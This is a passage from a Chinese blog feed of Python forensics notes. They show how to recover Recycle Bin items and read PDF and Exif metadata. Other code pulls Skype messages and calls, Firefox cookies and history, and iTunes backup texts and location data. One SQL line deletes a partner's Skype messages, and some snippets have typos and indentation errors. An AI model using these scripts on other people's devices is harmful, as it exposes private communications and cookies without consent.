    <span class="n">r_lon</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"maplon=.*\&amp;"</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r_lon</span><span class="p">:</span>
        <span class="n">map_lon</span> <span class="o">=</span> <span class="n">r_lon</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Lat: {}, Lon: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">map_lat</span><span class="p">,</span> <span class="n">map_lon</span><span class="p">))</span>
</code></pre></div></div>

<h2 id="用-python-恢复被删入回收站中的内容">用 Python 恢复被删入回收站中的内容</h2>

<p>在使用 FAT 文件系统的 Windows 98 及之前的 Windows 系统中，回收站目录是 <code class="language-plaintext highlighter-rouge">C:\Recycled\</code>。在包括 Windows NT/2000 和 Windows XP 在内的支持 NTFS 的操作系统中，回收站是 <code class="language-plaintext highlighter-rouge">C:\Recycler\目录</code>。在 Windows Vista 和 Windows 7 中，回收站目录则是 <code class="language-plaintext highlighter-rouge">C:\$Recycle.Bin</code></p>

<h3 id="使用-os-模块寻找被删除的文件文件夹">使用 OS 模块寻找被删除的文件/文件夹</h3>

<p>依次测试各个文件夹即可，不是判断操作系统再来找对应文件夹</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="k">def</span> <span class="nf">return_dir</span><span class="p">():</span>
    <span class="n">dirs</span> <span class="o">=</span> <span class="p">[</span><span class="s">"c:/Recycler/"</span><span class="p">,</span> <span class="s">"c:/Recycled/"</span><span class="p">,</span> <span class="s">"C:/$Recycle.Bin/"</span><span class="p">]</span>
    <span class="k">for</span> <span class="n">recycle_dir</span> <span class="ow">in</span> <span class="n">dirs</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">isdir</span><span class="p">(</span><span class="n">recycle_dir</span><span class="p">):</span>
            <span class="k">return</span> <span class="n">recycle_dir</span>
    <span class="k">return</span> <span class="bp">None</span>
</code></pre></div></div>

<p>在找到回收站目录之后，就要去检查其中的内容。其中有两个子目录，都含有字符串 <code class="language-plaintext highlighter-rouge">S-1-5-21-1275210071-1715567821-725345543-</code>，并分别以 1005 或 500 结尾。这个字符串表示的是用户的 SID，它对应的是机器里一个唯一的用户帐户</p>

<h3 id="用-python-把-sid-和用户名关联起来">用 Python 把 SID 和用户名关联起来</h3>

<p>可以用 Windows 注册表把 SID 转换成一个准确的用户名。检查的是注册表键 <code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\SOFT-WARE\Microsoft\Windows NT\CurrentVersion\ProfileList\&lt;SID&gt;\ProfileImagePath</code>，看到返回的是 <code class="language-plaintext highlighter-rouge">%SystemDrive%\Documents and Settings\&lt;USERID&gt;</code> 值。通过 <code class="language-plaintext highlighter-rouge">reg query</code> 命令，可以直接把 SID 转成用户名</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:<span class="se">\R</span>ECYCLER&gt;reg query <span class="s2">"HKEY_LOCAL...."</span> /v ProfileImagePath
</code></pre></div></div>

<p>通过 Python 实现，打开注册表检查 ProfileImagePath 键，提取出其中存放的值，并返回位于用户路径中最后一个反斜杠之后的用户名</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">_winreg</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">sid2user</span><span class="p">(</span><span class="n">sid</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span> <span class="s">"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">sid</span><span class="p">))</span>
        <span class="n">value</span><span class="p">,</span> <span class="nb">type</span> <span class="o">=</span> <span class="n">QueryValueEx</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="s">"ProfileImagePath"</span><span class="p">)</span>
        <span class="n">user</span> <span class="o">=</span> <span class="n">value</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\\</span><span class="s">"</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">user</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">sid</span>
</code></pre></div></div>

<h2 id="元数据">元数据</h2>

<p>作为一种文件里非明显可见的对象，元数据可以存在于文档、电子表格、图片、音频和视频文件中。创建这些文件的应用程序可能会把文档的作者、创建和修改时间、可能的更新版本和注释这类详细信息存储下来。</p>

<h3 id="使用-pypdf-解析-pdf-文件中的元数据">使用 PyPDF 解析 PDF 文件中的元数据</h3>

<p>PyPDF 允许提取文档中的内容，或对文档进行分割、合并、复制、加密和解密操作。若要提取元数据，可以使用 <code class="language-plaintext highlighter-rouge">.getDocumentInfo()</code> 方法，该方法会返回一个 tuple 数组，每个 tuple 中都含有对元数据元素的一个描述及它的值。逐一遍历这个数组，就能打印出 PDF 文档的所有元数据。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pyPdf</span>
<span class="kn">from</span> <span class="nn">pyPdf</span> <span class="kn">import</span> <span class="n">PdfFileReader</span>
<span class="k">def</span> <span class="nf">print_meta</span><span class="p">(</span><span class="n">file_name</span><span class="p">):</span>
    <span class="n">pdf_file</span> <span class="o">=</span> <span class="n">PdfFileReader</span><span class="p">(</span><span class="nb">file</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">))</span>
    <span class="n">doc_info</span> <span class="o">=</span> <span class="n">pdf_file</span><span class="p">.</span><span class="n">getDocumentInfo</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] PDF MetaData For: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">meta_item</span> <span class="ow">in</span> <span class="n">doc_info</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">meta_item</span><span class="p">,</span> <span class="n">doc_info</span><span class="p">[</span><span class="n">meta_item</span><span class="p">]))</span>
</code></pre></div></div>

<h3 id="理解-exif-元数据">理解 Exif 元数据</h3>

<p>Exif（exchange image file format，交换图像文件格式）标准定义了如何存储图像和音频文件的标准。</p>

<p>Exif 标准中含有多个对取证调查非常有用的标签（tag），工具 <code class="language-plaintext highlighter-rouge">exiftool</code> 用它可以解析这些标签。</p>

<h3 id="用-beautifulsoup-下载图片">用 BeautifulSoup 下载图片</h3>

<p>BeautifulSoup 允许我们快速解析 HTML 和 XML 文档</p>

<p>实现查找所有 img 标签并下载：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">urllib2</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifuleSoup</span>
<span class="kn">from</span> <span class="nn">urlparser</span> <span class="kn">import</span> <span class="n">urlsplit</span>
<span class="kn">from</span> <span class="nn">os.path</span> <span class="kn">import</span> <span class="n">basename</span>

<span class="k">def</span> <span class="nf">find_images</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Finding images on {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">url</span><span class="p">))</span>
    <span class="n">url_content</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">url_content</span><span class="p">)</span>
    <span class="n">img_tags</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">findAll</span><span class="p">(</span><span class="s">"img"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">img_tags</span>

<span class="k">def</span> <span class="nf">download_image</span><span class="p">(</span><span class="n">img_tag</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Downloading image..."</span><span class="p">)</span>
        <span class="n">img_src</span> <span class="o">=</span> <span class="n">img_tag</span><span class="p">[</span><span class="s">"src"</span><span class="p">]</span>
        <span class="n">img_content</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">img_src</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
        <span class="n">img_file_name</span> <span class="o">=</span> <span class="n">basename</span><span class="p">(</span><span class="n">urlsplit</span><span class="p">(</span><span class="n">img_src</span><span class="p">)[</span><span class="mi">2</span><span class="p">])</span>
        <span class="n">img_file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">img_file_name</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span>
        <span class="n">img_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">img_content</span><span class="p">)</span>
        <span class="n">img_file</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">img_file_name</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">""</span>
</code></pre></div></div>

<h3 id="用-python-的图像处理库读取图片中的-exif-元数据">用 Python 的图像处理库读取图片中的 Exif 元数据</h3>

<p>利用 PIL 库提取 GPS 元数据：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">from</span> <span class="nn">PIL.ExifTags</span> <span class="kn">import</span>  <span class="n">TAGS</span>

<span class="k">def</span> <span class="nf">test_for_exif</span><span class="p">(</span><span class="n">image_file_name</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">exif_data</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="n">img_file</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">image_file_name</span><span class="p">)</span>
        <span class="n">info</span> <span class="o">=</span> <span class="n">img_file</span><span class="p">.</span><span class="n">_getexif</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">info</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">tag</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">info</span><span class="p">.</span><span class="n">items</span><span class="p">():</span>
                <span class="n">decoded</span> <span class="o">=</span> <span class="n">TAGS</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">tag</span><span class="p">,</span> <span class="n">tag</span><span class="p">)</span>
                <span class="n">exif_data</span><span class="p">[</span><span class="n">decoded</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span>
            <span class="n">exif_gps</span> <span class="o">=</span> <span class="n">exif_data</span><span class="p">[</span><span class="s">"GPSINFO"</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">exif_gps</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} contains GPS MetaData"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">img_file_name</span><span class="p">))</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
</code></pre></div></div>

<h2 id="用-python-分析应用程序的使用记录">用 Python 分析应用程序的使用记录</h2>

<h3 id="理解-skype-中的-sqlite3-数据库">理解 Skype 中的 SQLite3 数据库</h3>

<p>在 Windows 系统中，Skype 在 <code class="language-plaintext highlighter-rouge">C:\Documents and Settings\&lt;User&gt;\ApplicationData\Skype\&lt;Skype-account&gt;</code> 目录中存储了一个名为 <code class="language-plaintext highlighter-rouge">main.db</code> 的数据库。在 macOS 系统中，这个数据库的存储路径为 <code class="language-plaintext highlighter-rouge">/Users/&lt;User&gt;/Library/Application Support/Skype/&lt;Skype-account&gt;</code></p>

<p>连接 SQLite3 数据库后 <code class="language-plaintext highlighter-rouge">SELECT tbl_name FROM sqlite_master WHERE type=='table'</code>，SQLite 数据库维护一张名为 <code class="language-plaintext highlighter-rouge">sqlite_master</code> 的表，这张表中含有一个名为 <code class="language-plaintext highlighter-rouge">tbl_name</code> 的列，其中描述了数据库中的各张表。</p>

<p>Accounts 表记录了使用该应用程序的用户账户的相关信息，其中的各列记录了用户名、Skype 的昵称、用户的位置和创建该账户的日期等信息。</p>

<p>数据库是以 UNIX 时间格式存储账户创建时间的，SQL 方法 <code class="language-plaintext highlighter-rouge">datetime()</code> 可以把这个值转换成更方便阅读的格式</p>

<h3 id="使用-python-和-sqlite3-自动查询-skype-的数据库">使用 Python 和 SQLite3 自动查询 Skype 的数据库</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sqlite3</span>
<span class="k">def</span> <span class="nf">print_profile</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT fullname, skypename, city, country, datetime(profile_timestamp, 'unixepoch') FROM Accounts;"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Account --"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] User: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Skype Username: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Location: {},{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Profile Date: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">4</span><span class="p">]))</span>
</code></pre></div></div>

<p>多表处理：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_call_log</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT datetime(begin_timestamp, 'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Calls --"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Time: {} | partner: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
</code></pre></div></div>

<p>Skype 的数据库会把所有发送和收到的消息都保存在数据库中。数据库中把这些信息存放在一张名为 <code class="language-plaintext highlighter-rouge">Messages</code> 的表中。从这张表中用 SELECT 语句选出 timestamp、<code class="language-plaintext highlighter-rouge">dialog_partner</code>、author 和 <code class="language-plaintext highlighter-rouge">body_xml</code>。注意，如果 <code class="language-plaintext highlighter-rouge">dialog_partner</code> 和 author 字段是不一样的，那么就是数据库的所有者发送这条消息给 <code class="language-plaintext highlighter-rouge">dialog_partner</code> 的。反之，如果 <code class="language-plaintext highlighter-rouge">dialog_partner</code> 和 author 字段是一样的，就是 <code class="language-plaintext highlighter-rouge">dialog_partner</code> 发送的这条消息，这时需要在消息前加一个 <code class="language-plaintext highlighter-rouge">from</code></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_messages</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT datetime(timestamp, 'unixepoch'), dialog_partner, author, body_xml FROM Messages;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Messages --"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">if</span> <span class="s">"partlist"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]):</span>
                <span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">!=</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]):</span>
                    <span class="n">msg_direction</span> <span class="o">=</span> <span class="s">"To {}: "</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
        	<span class="k">else</span><span class="p">:</span>
            	<span class="n">msg_direction</span> <span class="o">=</span> <span class="s">"From {}: "</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Time: {} {} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">msg_direction</span><span class="p">,</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
</code></pre></div></div>

<h3 id="其他有用的一些-skype-查询语句">其他有用的一些 Skype 查询语句</h3>

<p>只想打印出联系人列表中其生日不为空的联系人：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">fullname</span><span class="p">,</span> <span class="n">birthday</span> <span class="k">FROM</span> <span class="n">contacts</span> <span class="k">WHERE</span> <span class="n">birthday</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span>	
</code></pre></div></div>

<p>只想输出 conversation 表中只与某个特定的 <code class="language-plaintext highlighter-rouge">&lt;SKYPE-PARTNER&gt;</code> 相关的通话记录：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="nb">datetime</span><span class="p">(</span><span class="nb">timestamp</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">),</span> <span class="n">dialog_partner</span><span class="p">,</span> <span class="n">author</span><span class="p">,</span> <span class="n">body_xml</span><span class="p">,</span> <span class="k">FROM</span> <span class="n">Messages</span> <span class="k">WHERE</span> <span class="n">dialog_partner</span><span class="o">=</span><span class="s1">'&lt;SKYPE-PARTNER&gt;'</span>
</code></pre></div></div>

<p>要删除 conversation 表中只与某个特定的 <code class="language-plaintext highlighter-rouge">&lt;SKYPE-PARTNER&gt;</code> 相关的通话记录</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">DELETE</span> <span class="k">FROM</span> <span class="n">messages</span> <span class="k">WHERE</span> <span class="n">skypename</span><span class="o">=</span><span class="s1">'&lt;SKYPE-PARTNER&gt;'</span>
</code></pre></div></div>

<h3 id="用-python-解析火狐浏览器的-sqlite3-数据库">用 Python 解析火狐浏览器的 SQLite3 数据库</h3>

<p>在 Windows 操作系统中，火狐把这些数据库存放在 <code class="language-plaintext highlighter-rouge">"C:/Documents and Settings/&lt;USER&gt;/Application Data/Mozilla/Firefox/Profiles/&lt;profile folder&gt;/"</code> 目录中，在 macOS 系统中，火狐把这些数据库存放在 <code class="language-plaintext highlighter-rouge">"/Users/&lt;USER&gt;/Library/Application Support/Firefox/Profiles/&lt;profile folder&gt;"</code> 目录中</p>

<p>文件 <code class="language-plaintext highlighter-rouge">downloads.sqlite</code> 数据库时火狐用户下载文件的相关信息。其中只有一张名为 <code class="language-plaintext highlighter-rouge">moz_downloads</code> 的表记录了文件名、源下载地址、下载时间、文件大小、引用（referrer）和本地存放该文件的路径。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sqlite3</span>
<span class="k">def</span> <span class="nf">print_downloads</span><span class="p">(</span><span class="n">download_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">download_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT name, source, datetime(endTime/1000000, 'unixepoch') FROM moz_downloads;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] --- Files Downloaded ---"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] File: {} from source: {} at: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]))</span>
</code></pre></div></div>

<p>数据库 <code class="language-plaintext highlighter-rouge">moz_cookies</code> 表中保存的是 cookie 相关的数据。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_cookies</span><span class="p">(</span><span class="n">cookies_db</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">cookie_db</span><span class="p">)</span>
        <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
        <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT host, name, value FROM moz_cookies"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] --- Found Cookies ---"</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
            <span class="n">host</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">name</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">value</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Host: {}, Cookie: {}, Value: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"encrypted"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Error reading your cookies database."</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Upgrade your Python-Sqlite3 Library"</span><span class="p">)</span>
</code></pre></div></div>

<p>上网历史记录保存在 <code class="language-plaintext highlighter-rouge">places.sqlite</code> 的数据库中，其中的 <code class="language-plaintext highlighter-rouge">moz_places</code> 表可以给出关于用户在何时（时间）访问了何处（地址）的网站信息。ForensicWiki 网站上建议使用 <code class="language-plaintext highlighter-rouge">moz_places</code> 和 <code class="language-plaintext highlighter-rouge">moz_historyvisits</code> 表中的数据，以获取一张真正的浏览器上网历史记录。</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">url</span><span class="p">,</span> <span class="nb">datetime</span><span class="p">(</span><span class="n">visit_date</span><span class="o">/</span><span class="mi">1000000</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">moz_places</span><span class="p">,</span> <span class="n">moz_historyvisits</span> <span class="k">WHERE</span> <span class="n">visit_count</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="k">AND</span> <span class="n">moz_places</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">moz_historyvisits</span><span class="p">.</span><span class="n">place_id</span><span class="p">;</span>
</code></pre></div></div>

<h3 id="用-python-调查-itunes-的手机备份">用 Python 调查 iTunes 的手机备份</h3>

<p>苹果的 iOS 操作系统实际上会跟踪和记录设备的 GPS 经纬度信息，并把它们存储在 <code class="language-plaintext highlighter-rouge">consolidated.db</code> 的数据库中。其中有一张名为 <code class="language-plaintext highlighter-rouge">Cell-Location</code> 的表，其中含有手机已经收集到的 GPS 定位点。在备份移动设备时，记录到计算机的移动设备的副本也含有这一信息。尽管 iOS 操作系统设计的功能会删除这些地理位置信息，但调查发现这些数据仍然存在。</p>

<p>当用户对 iPhone/iPad 设备进行备份时，它会把相关文件存放到计算机中一个特定的目录中。在 Windows 操作系统中，iTunes 应用程序会把数据存放在用户目录下的移动设备备份目录中（<code class="language-plaintext highlighter-rouge">C:/Documents and Settings/&lt;USERNAME&gt;/Application Data/AppleComputer/MobileSync/Backup</code>），而在 macOS 中，这个目录则是 <code class="language-plaintext highlighter-rouge">/Users/&lt;USERNAME&gt;/Library/Application Support/MobileSync/Backup/</code>。对移动设备进行备份的 iTunes 程序会把所有的设备备份文件都存放在这个目录中。</p>

<p>为了获取关于文件的信息，用 UNIX 命令 <code class="language-plaintext highlighter-rouge">file</code> 来分析各个文件的文件类型。可以看到移动设备备份目录中有一些 SQLite3 数据库文件、JPEG 图片文件、纯二进制文件和 ASCII 文本文件</p>

<p>可以用脚本快速列举出在整个移动设备备份目录中每一个数据库中所有表的表名：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">tbl_name</span> <span class="k">FROM</span> <span class="n">sqlite_master</span> <span class="k">WHERE</span> <span class="k">type</span><span class="o">==</span><span class="nv">"table"</span>
</code></pre></div></div>

<p>每个 SQLite 数据库中都会维护一张名为 <code class="language-plaintext highlighter-rouge">sqlite_master</code> 的表，其中含有整个数据库结构的信息，记录了整个数据库中各张表的结构。</p>

<p>含有 <code class="language-plaintext highlighter-rouge">message</code> 表的库即为文本消息数据库，可以把发送时间、对方手机号码以及消息本身打印出来：</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="nb">datetime</span><span class="p">(</span><span class="nb">date</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">),</span> <span class="n">address</span><span class="p">,</span> <span class="nb">text</span> <span class="k">FROM</span> <span class="n">message</span> <span class="k">WHERE</span> <span class="n">address</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><summary type="html"><![CDATA[用 Python 进行取证调查]]></summary></entry><entry><title type="html">Penetration Testing with Python</title><link href="https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python/" rel="alternate" type="text/html" title="Penetration Testing with Python" /><published>2024-08-14T00:00:00+00:00</published><updated>2024-08-14T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python/"><![CDATA[<h2 id="用-python-进行渗透测试">用 Python 进行渗透测试</h2>

